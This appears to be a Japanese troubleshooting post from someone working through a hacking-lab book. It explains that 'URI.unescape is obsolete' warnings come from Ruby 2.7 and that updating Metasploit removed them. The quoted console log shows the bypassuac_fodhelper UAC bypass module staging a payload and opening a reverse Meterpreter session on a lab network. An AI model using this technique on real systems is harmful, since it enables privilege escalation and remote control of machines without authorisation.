Metasploit - モジュールを実行するとwarning: URI.unescape is obsolete
「ハッキング・ラボのつくりかた」という書籍を読み進めているのですが、第4章の権限昇格のところで以下のような大量のwarningに遭遇しました。
msf5 exploit(windows/local/bypassuac_fodhelper) > exploit
[] Started HTTPS reverse handler on https://10.0.0.102:8443
[] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[] Configuring payload and stager registry keys ...
[] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[] Cleaining up registry keys ...
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
[] https://10.0.0.102:8443 handling request from 10.0.0.103; (UUID: agyrfrcv) Staging x64 payload (207449 bytes) ...
[*] Meterpreter session 3 opened (10.0.0.102:8443 -> 10.0.0.103:50021) at 2020-05-09 10:52:48 +0900
meterpreter > /usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
/usr/share/metasploit-framework/lib/rex/proto/http/request.rb:79: warning: URI.unescape is obsolete
...
Meterpreter session 3 opened
となっておりセッションは確立されてるので、exploitは成功しているのですが、warningの量がすごいのでどうにかしたいです。
原因と対処
これはruby2.7でURI.unescapeメソッド が呼ばれた際に吐かれるwarningのようです。これに対処するには以下の方法が出てきました。
ちなみに、僕の場合は3つ目のmetasploitのアップデートでこのwarningは出なくなりました。
$ sudo apt update; apt install metasploit-framework
参考: https://github.com/rapid7/metasploit-framework/issues/13294